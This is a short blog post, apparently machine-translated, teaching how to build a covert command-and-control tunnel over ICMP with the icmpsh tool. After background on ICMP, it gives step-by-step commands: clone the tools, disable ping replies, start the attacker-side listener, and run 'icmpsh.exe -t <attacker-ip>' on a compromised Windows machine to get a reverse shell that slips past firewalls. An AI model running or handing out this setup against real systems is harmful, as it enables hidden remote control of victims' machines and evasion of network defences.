Hidden C2 tunnel -- use of icmpsh of ICMP

Learning records of pure rookies , Please correct any mistakes

Let's first get to know ICMP Make an agreement

ICMP Used to pass errors , control , Query and other information , At the network level , because IP The agreement is unreliable , And then there is ICMP agreement , Due to network detection , Route tracking and feedback

ICMP Message type ：

Code fields of unreachable types often take values ：

The timeout message code field is commonly used ：

Message format ：

Refer to https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187

hide c2 Tunnel of icmpsh

principle ： During covert transmission , The attacker hides the command to be executed in ICMP_ECHO In the packet , Broiler receives packets , Solve the command and execute it on the host inside the firewall, and then hide the execution result in ICMP_ECHOREPLY In the packet , Send it to the external attacker

Use key points ： Data section

The picture below is ping, then wireshark Grasping ICMP package

ps：ICMP The message is processed by the system kernel , Do not occupy any ports ( Generally, the communication needs ports , For example, you visit a website [80 port ], This opportunity randomly generates a greater than 1023 To access )

Tools ：icmpsh Deal with deformities ping data

Attacked must be Windows,,,

1. download ：

git clone https://github.com/inquisb/icmpsh.git

2. close ping reply , Prevent the kernel itself from ping Package response , refresh

sysctl -w net.ipv4.icmp_echo_ignore_all=1 # close ping reply ,0 Turn on

3. Installation environment

git clone https://github.com/SecureAuthCorp/impacket.git # If you fail, try connecting directly to the physical network

cd impacket

sudo python setup.py install

The attack end ：

cd icmpsh

./icmpsh_m.py <attacker’ s-ip> The attacked party # command

The attacked plane ordered

icmpsh.exe -t <attacker’ s-ip>

perform whoami

ok Let's see ICMP Data packets （ There are too many packets , Don't stop grabbing , Packets always have ,wireshark too strong ） data Part is whoami

Learn from vulnerability banks